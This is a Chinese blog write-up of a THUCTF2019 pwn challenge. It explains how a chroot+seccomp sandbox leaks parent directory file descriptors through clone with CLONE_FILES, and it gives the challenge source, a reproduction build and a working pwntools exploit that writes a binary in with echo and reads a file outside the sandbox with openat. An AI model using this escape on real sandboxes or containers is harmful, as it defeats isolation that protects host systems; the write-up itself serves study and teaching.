[chroot+seccomp逃逸] THUCTF2019 之 固若金汤

已于 2023-11-24 22:25:13 修改
阅读量376 收藏
点赞数
分类专栏: # 每日一“胖“ 文章标签: pwn 沙盒逃逸
于 2023-11-24 22:22:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134607674
版权
文章讲述了通过分析一个C程序,该程序使用Seccomp和clone系统调用来创建安全沙箱,但发现了一个漏洞,允许用户通过目录穿越和利用内建命令执行任意shell命令。作者给出了漏洞分析、利用方法和本地复现的示例。
摘要由CSDN通过智能技术生成

题目分析

附件为一个源码, 其中注释我都写好了, 主要就讲关键的知识点.

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <seccomp.h>
#include <linux/seccomp.h>
#include <openssl/md5.h>
#include <sys/resource.h>


int main(int argc, char **argv)
{
    MD5_CTX ctx;
    char md5_res[17]="";
    char key[100]="";
    char sandbox_dir[100]="/home/ctf/sandbox/";
    char dir_name[100]="/home/ctf/sandbox/";

    char buf[0x11111] ,ch;
    FILE *pp;
    int i;
    int pid, fd;

    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
	/*
	struct rlimit 结构体定义了一个资源限制。它包含两个字段:
		rlim_cur: 当前资源限制。
		rlim_max: 最大资源限制。
	struct rlimit {
		__kernel_ulong_t rlim_cur;
		__kernel_ulong_t rlim_max;
	};
	
	*/
    struct rlimit r;
	// 设置进程的核心文件大小限制为 0
	// 这意味着进程在发生段错误时不会生成核心 core 文件
    r.rlim_max = r.rlim_cur = 0;
    setrlimit(RLIMIT_CORE, &r);

    memset(key, 0, sizeof(key));
    printf("input your key:\n");
    read(0, key, 20);
	// 对 key 进行 md5, 结果保存在 md5_res 中
    MD5_Init(&ctx);
    MD5_Update(&ctx, key, strlen(key));
    MD5_Final(md5_res, &ctx);
    for(int i = 0; i < 16; i++) 
        sprintf(&(dir_name[i*2 + 18]), "%02hhx", md5_res[i]&0xff);

    printf("dir : %s\n", dir_name);
    printf("So, what's your command, sir?\n");

    for (i=0;i<0x11100;i++)
    {
        read(0, &ch, 1);
        if (ch=='\n' || ch==EOF)
        {
            break;
        }
        buf[i] = ch;
    }
	// 创建一个进程
    pid = syscall(__NR_clone, CLONE_NEWNS | CLONE_NEWPID | CLONE_NEWUSER | CLONE_FILES | CLONE_NEWUTS | CLONE_NEWNET, 0, 0, 0, 0);
    if (pid) {
        if (open(sandbox_dir, O_RDONLY) == -1)
        {
            perror("fail to open sandbox dir");
            exit(1);
        }

        if (open(dir_name, O_RDONLY) != -1)
        {
        	printf("Entering your dir\n");
            if (chdir(dir_name)==-1)
            {
                puts("chdir err, exiting\n");
                exit(1);
            }
        }
        else
        {	
			// dir_name 不存在的话则进行创建并配置相关信息
           	printf("Creating your dir\n");
			// 创建一个目录
            mkdir(dir_name, 0755);
            printf("Entering your dir\n");
			// 进入 dir_name 目录
            if (chdir(dir_name)==-1)
            {
                puts("chdir err, exiting\n");
                exit(1);
            }
			// 创建相关文件夹
            mkdir("bin", 0777);
            mkdir("lib", 0777);
            mkdir("lib64", 0777);
            mkdir("lib/x86_64-linux-gnu", 0777);
			// 复制相关文件到当前工作目录下的文件夹中
            system("cp /bin/bash bin/sh");
            system("cp /bin/chmod bin/");
            system("cp /usr/bin/tee bin/");
            system("cp /lib/x86_64-linux-gnu/libtinfo.so.5 lib/x86_64-linux-gnu/");
            system("cp /lib/x86_64-linux-gnu/libdl.so.2 lib/x86_64-linux-gnu/");
            system("cp /lib/x86_64-linux-gnu/libc.so.6 lib/x86_64-linux-gnu/");
            system("cp /lib64/ld-linux-x86-64.so.2 lib64/");
        }

        char uidmap[] = "0 1000 1", filename[30];
        char pid_string[7];
        sprintf(pid_string, "%d", pid);
		// filename 为 /proc/pid/uid_map
		// 文件包含了当前进程的 UID 映射信息
		// 格式为: <inside-uid> <outside-uid> <count>
		// <inside-uid> 是进程内部的 UID
		// <outside-uid> 是进程外部的 UID
		// <count> 是映射的 UID 的数量
        sprintf(filename, "/proc/%s/uid_map", pid_string);
        fd = open(filename, O_WRONLY|O_CREAT);
		// 写入 0 1000 1
		// 表示进程内部的 UID 0 映射到进程外部的 UID 1000
		// 这意味着进程在容器内部的 UID 为 0,但在容器外部的 UID 为 1000
        if (write(fd, uidmap, sizeof(uidmap)) == -1)
        {
            printf("write to uid_map Error!\n");
            printf("errno=%d\n",errno);
        }
        exit(0);
    }
    sleep(1);

    // entering sandbox
    if (chdir(dir_name)==-1)
    {
        puts("chdir err, exiting\n");
        exit(1);
    }
	// 更改当前目录为该进程的根目录
    if (chroot(".") == -1)
    {
        puts("chroot err, exiting\n");
        exit(1);
    }

    // set seccomp
	// 设置沙箱, 杀了 mkdir, link, symlink, unshare, prctl, chroot, seccomp 系统调用
    scmp_filter_ctx sec_ctx;
    sec_ctx = seccomp_init(SCMP_ACT_ALLOW);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(mkdir), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(link), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(symlink), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(unshare), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(prctl), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(chroot), 0);
    seccomp_rule_add(sec_ctx, SCMP_ACT_KILL, SCMP_SYS(seccomp), 0);
    seccomp_load(sec_ctx);
	// 执行命令, 管道只能写
    pp = popen(buf, "w");
    if (pp == NULL)
        exit(0);
    pclose(pp);
    return 0;
}

总的来说功能就是用户输入一个 key, 然后对其进行 md5, 用此作为路径名设置沙箱, 在沙箱中可以执行一条 shell 命令.

漏洞分析

 漏洞主要在下面这句代码.

 pid = syscall(__NR_clone, CLONE_NEWNS | CLONE_NEWPID | CLONE_NEWUSER | CLONE_FILES | CLONE_NEWUTS | CLONE_NEWNET, 0, 0, 0, 0);

可以看到其设置了 CLONE_FILES 标志, 这表示父子进程共享文件打开表. 而题目在父进程中打开了以下三个文件并且没有关闭:( 这里目录统称为文件

1) /home/ctf/sandbox/

2) /home/ctf/sandbox/md5(key)

3) /proc/pid/uid_map

其对应的文件描述符依次为3, 4, 5. 所以可以利用 openat 函数进行逃逸:

#include <fcntl.h>
int openat(int dirfd, const char *pathname, int flags, ...);
  • dirfd 是要打开文件的目录的文件描述符。
  • pathname 是要打开的文件的路径名。
  • flags 是打开文件的标志。

 所以这里如果我们设置 dirfd 为 3, 然后 pathname 使用 ../../ 进行目录穿越即可完成逃逸

这里有个 demo:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/resource.h>

int main(int argc, char** argv, char** envp)
{
        FILE* pp;
        int pid;
        pid = syscall(__NR_clone, CLONE_FILES|CLONE_NEWNS|CLONE_NEWPID|CLONE_NEWUSER|CLONE_NEWUTS|CLONE_NEWNET, 0, 0, 0, 0);
        if (pid)
        {
                open("/tmp", O_RDONLY);
                printf("1 Pid: %d\n", getpid());
                printf("2 Child Pid: %d\n", pid);
                sleep(30);
                exit(0);
        }
        sleep(1);
        printf("3 Child pid: %d\n", getpid());
        pp = popen("echo '4 Pid: '$$;sleep 100", "w");
        if (!pp) exit(0);
        pclose(pp);
        return 0;
}

可以看到4个进程中都存在 3 这个文件描述符并且指向同一位置 

漏洞利用

在漏洞分析阶段, 我们已经提出了利用方式, 即通过 openat 配合父进程"遗留"的文件描述符实现逃逸.

但是这里就存在一个问题了, 在题目分析中已经说了, 最后我们只能通过 popen 去执行一个 shell 命令. 而原则上题目只给了 bash, chmod, tee 三个 shell 命令. 而我们最后是要利用 openat 打开 flag文件进行读取输出, 所以我们像 kernel pwn 那样上传一个 exp 然后执行. 那么如何将 exp 写入文件呢? 在 kernel pwn 中我们都是通过 echo 来完成的. 这里有 echo 吗? 答案是有的, 别忘了内建命令.

看看 gpt 的回答: 

  • 可用性不同:内建命令在所有 Linux 系统上都可用,而非内建命令则需要安装相应的软件包才能使用。

而我们可以通过 type 去简单判断一下是否是内建命令. 比如:

本地复现

修改代码为如下代码: 注: 这里仅仅为了本地复现而已, 所以把 seccomp 给删了:(因为我虚拟机没下

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/stat.h>


int main(int argc, char **argv)
{
    char sandbox_dir[100]="/home/xiaozaya/rubbish/fx/sandbox/";
    char dir_name[100]="/home/xiaozaya/rubbish/fx/sandbox/511721";

    char buf[0x11111] ,ch;
    FILE *pp;
    int i;
    int pid, fd;

    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

    struct rlimit r;

    r.rlim_max = r.rlim_cur = 0;
    setrlimit(RLIMIT_CORE, &r);

    printf("dir : %s\n", dir_name);
    printf("So, what's your command, sir?\n");

    for (i=0;i<0x11100;i++)
    {
        read(0, &ch, 1);
        if (ch=='\n' || ch==EOF)
        {
            break;
        }
        buf[i] = ch;
    }

    pid = syscall(__NR_clone, CLONE_NEWNS | CLONE_NEWPID | CLONE_NEWUSER | CLONE_FILES | CLONE_NEWUTS | CLONE_NEWNET, 0, 0, 0, 0);
    if (pid) {
        if (open(sandbox_dir, O_RDONLY) == -1)
        {
            perror("fail to open sandbox dir");
            exit(1);
        }

        if (open(dir_name, O_RDONLY) != -1)
        {
                printf("Entering your dir\n");
            if (chdir(dir_name)==-1)
            {
                puts("chdir err, exiting\n");
                exit(1);
            }
        }
        else
        {
            printf("Creating your dir\n");
            mkdir(dir_name, 0755);
            printf("Entering your dir\n");
            if (chdir(dir_name)==-1)
            {
                puts("chdir err, exiting\n");
                exit(1);
            }
            mkdir("bin", 0777);
            mkdir("lib", 0777);
            mkdir("lib64", 0777);
            mkdir("lib/x86_64-linux-gnu", 0777);
            system("cp /bin/bash bin/sh");
            system("cp /bin/chmod bin/");
            system("cp /usr/bin/tee bin/");
            system("cp /lib/x86_64-linux-gnu/libtinfo.so.6 lib/x86_64-linux-gnu/");
            system("cp /lib/x86_64-linux-gnu/libdl.so.2 lib/x86_64-linux-gnu/");
            system("cp /lib/x86_64-linux-gnu/libc.so.6 lib/x86_64-linux-gnu/");
            system("cp /lib64/ld-linux-x86-64.so.2 lib64/");
        }

        char uidmap[] = "0 1000 1", filename[30];
        char pid_string[7];
        sprintf(pid_string, "%d", pid);

        sprintf(filename, "/proc/%s/uid_map", pid_string);
        fd = open(filename, O_WRONLY|O_CREAT);
        if (write(fd, uidmap, sizeof(uidmap)) == -1)
        {
            printf("write to uid_map Error!\n");
            printf("errno=%d\n",errno);
        }
        exit(0);
    }
    sleep(1);

    // entering sandbox
    if (chdir(dir_name)==-1)
    {
        puts("chdir err, exiting\n");
        exit(1);
    }

    if (chroot(".") == -1)
    {
        puts("chroot err, exiting\n");
        exit(1);
    }

    pp = popen(buf, "w");
    if (pp == NULL)
        exit(0);
    pclose(pp);
    return 0;
}

exp 如下:

import os
from pwn import *
import codecs

io = process("./pwn")

code = '''
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
int main(){
        char buf[20]={0};
        int fd = openat(4, "../flag", 0);
        read(fd, buf, 100);
        write(1, buf, 0x20);
        printf("Good !\\n");
}
'''

a = open('exp.c','w')
a.write(code)
a.close()
os.system("gcc exp.c -o exp")
b = open("./exp", "rb").read()
b = codecs.encode(b, "hex").decode()
c = ""
for i in range(0,len(b),2):
        c += '\\x'+b[i]+b[i+1]
payload = 'echo -e "'+c+'"'+'> exp;chmod +x exp; ./exp'
print("[+] length: " + hex(len(payload)))

io.recv()
io.sendline(payload)
io.recv()
io.interactive()

 效果如下:

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于网络安全的 Docker 逃逸
zxcvbnmasdflzl的博客
04-04 326
基于网络安全的 Docker 逃逸
PHP-FPM之Chroot执行环境详解
10-23
在PHP-FPM中设立chroot,有很好的隔离作用,提高系统安全性,但是要想建立一个合理的PHP-FPM Chroot环境难度有点大,比用debootstrap等工具建立还要麻烦,这篇文章就详细介绍了PHP-FPM之Chroot执行环境,需要的朋友...
35C3 CTF Pwn namespaces
yongbaoii的博客
01-18 650
docker逃逸ctf赛目
Docker SYS_ADMIN 容器逃逸原理解析
Jack_chao_的博客
03-27 929
如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。是对全局系统资源的一种封装隔离,使得处于不同 namespace 的进程拥有独立的全局系统资源,改变一个 namespace 中的系统资源只会影响当前 namespace 里的进程,对其他 namespace 中的进程没有影响。namespace是linux内核用来隔离内核资源的方案。
生命在于学习——docker逃逸
易水哲的博客
12-02 4651
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
NewStarCTF2023week4-逃(反序列化字符串逃逸
Welcome To Myon'Blog !
10-24 859
在反序列化的时候php会根据s所指定的字符长度去读取后边的字符,由于在序列化操作后又使用了str_replace()函数进行字符串替换,这就可能会改变字符串的长度,比如上面将bad替换为good,每替换掉一个bad,字符串长度明显就增加了1,而由于序列化之后s的值没变,但是进行了内容替换,改变了字符串长度,那么反序列化读取时,就并不能将原本的内容读取完全。得到:O:7:"GetFlag":2:{s:3:"key";而后面没有被读到的内容,也就是逃逸出来的字符串,就会被当做当前类的属性被继续执行。
Docker容器逃逸_--security-opt apparmor=unconfined,阿里面试100%会问到的网络安全
2401_84165919的博客
04-09 969
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
chroot命令 改变根目录
01-09
chroot命令用于改变根目录。chroot(change root)命令把根目录换成指定的目的目录。 语法格式:chroot [参数] 常用参数: –help  在线帮助 –version 显示版本信息 参考实例 改变根目录: [root@...
Linux chroot命令用法详解
01-09
Linux chroot命令 Linux chroot命令用于改变根目录。 chroot(change root)命令把根目录换成指定的目的目录。 、 语法chroot [--help][--version][目的目录][执行指令...] 参数说明: –help 在线帮助。 –version ...
如何通过chroot构建Linux操作系统
08-01
【如何通过chroot构建Linux操作系统】 在Linux世界中,通过chroot工具构建一个新的操作系统环境是一种常见且实用的技术。chroot,全称为Change Root,允许用户将一个进程的根目录(/)更改为指定的目录,从而在一个...
sandbox:简单Linux seccomp规则,无需编写任何代码
04-01
沙盒 Linux seccomp变得简单 该软件包提供了一种简单的方法,可以通过环境变量在任何应用程序(甚至是专有应用程序)中启用基本seccomp。 它与SystemCallFilter= 非常相似,但具有一些优点: 它没有一些systemd限制: execve,exit,exit_group,getrlimit,rt_sigreturn,sigreturn系统调用以及用于查询时间和睡眠的系统调用被隐式列入白名单... 它可以为动态链接的二进制文件提供更严格的过滤 建筑 构建系统期望的最新版本可以作为静态库使用。 建议从上游源构建它,而不要依赖特定发行版中的版本。 Makefile将在libseccomp目录中查找有效的树和内部版本,因​​此满足依赖关系的最简单方法是在项目目录中执行以下操作: user@dev: ~ /sandbox$ curl -L -O https://gi
seccomp_keystore
06-15
seccomp_keystore 概述 近年来,AOSP 中暴露了很多 Android 原生守护进程的漏洞,更不用说 OEM 定制的守护进程了。 去年 4.4 版本之前的 keystore 守护进程中发现了堆栈缓冲区溢出漏洞(CVE-2014-3100)。 该漏洞可用于绕过DEP、ASLR和堆栈cookie后执行任意代码。 由于Android严重的碎片化问题,现在仍有很多老设备受到该漏洞的威胁,未来还会暴露出更多Android原生守护进程的漏洞,尤其是OEM守护进程。 目前,我们只关注密钥库守护进程,未来将扩展到其他易受攻击的守护进程。 威胁模型:keystore中存在一个漏洞,攻击者可以绕过DEP、ASLR和stack cookie保护,利用该漏洞执行任意代码。 让我们看看这个合法的应用程序 (uid:10053),它向密钥库发送请求以生成密钥对(别名:a)。 密钥存储在路径“/dat
linux chroot命令详解
09-15
主要介绍了linux chroot命令详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
探秘chw00t:突破chroot的神奇工具
最新发布
gitblog_00065的博客
05-20 823
探秘chw00t:突破chroot的神奇工具 项目地址:https://gitcode.com/earthquake/chw00t 项目简介 chw00t是一个强大的开源工具,专门设计用于逃离chroot环境。尽管chroot本身并不是Unix系统中的安全特性,但在很多场景下却被误用为安全防护。有了chw00t,你可以有机会绕过这个限制,体验到真正的自由。 报告与回应 我们已经将这一漏洞报告给相关...
seccomp&ptcl(pwn出题)
qq_45595732的博客
03-27 1747
详细细节看这篇 https://www.anquanke.com/post/id/208364#h2-2 沙箱可以禁用一些系统调用,还是比较常见的感觉。 seccomp 下面这段代码用seccomp沙箱来禁用 安装相应库 sudo apt-get install libseccomp-dev 具体参数啥的就不多讲了。。。看大佬的博客就行。 //gcc -g simple_syscall_seccomp.c -o simple_syscall_seccomp -lseccomp #include <u
linux下的特权逃逸与docker逃逸(二)
好好睡觉
01-02 525
cap_sys_pstrace导致的dicker逃逸、cap_sys_module可以引发的提权、cap_sys_module可以引发的docker逃逸
【Linux 命令】chroot
呆呆的猫的博客
04-22 2447
本文介绍 linux chroot 命令
容器进阶看这一篇就够了
cugbtang
05-04 321
文章目录专有名词创建container流程容器的关键技术名词资源隔离和限制images引擎containerd 专有名词 containerd是容器技术标准化之后的产物,为了能够兼容OCI(open container i)标准 主要职责是镜像管理(镜像、元信息等)、容器执行(调用最终运行时组件执行) 理论上,即使不运行dockerd,也能够直接通过containerd来管理容器。(conta...
Runc容器运行过程及容器逃逸原理
绝对防御局的博客
02-21 1630
在每一个Kubernetes节点中,运行着kubelet,负责为Pod创建销毁容器,kubelet预定义了API接口,通过GRPC从指定的位置调用特定的API进行相关操作。而这些CRI的实现者,如cri-o, containerd等,通过调用runc创建出容器。runc功能相对单一,即针对特定的配置,构建出容器运行指定进程,它不能直接用来构建镜像,kubernetes依赖的如cri-o这类CRI,在runc基础上增加了通过API管理镜像,容器等功能。 Kubelet,Cri-O,runc,Linux大致层
PS1="\[\e]0;${debian_chroot:+(Sdebian_chroot)} \u@\h:\W\a\]sPS1"
09-27
${debian_chroot: (Sdebian_chroot)} \u@\h:\W\a\]sPS1" 这行代码是用于设置bash命令行提示符的格式。其中,\[\e]0;${debian_chroot: (Sdebian_chroot)} \u@\h:\W\a\]用于设置终端标题,\sPS1用于设置命令行提示符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值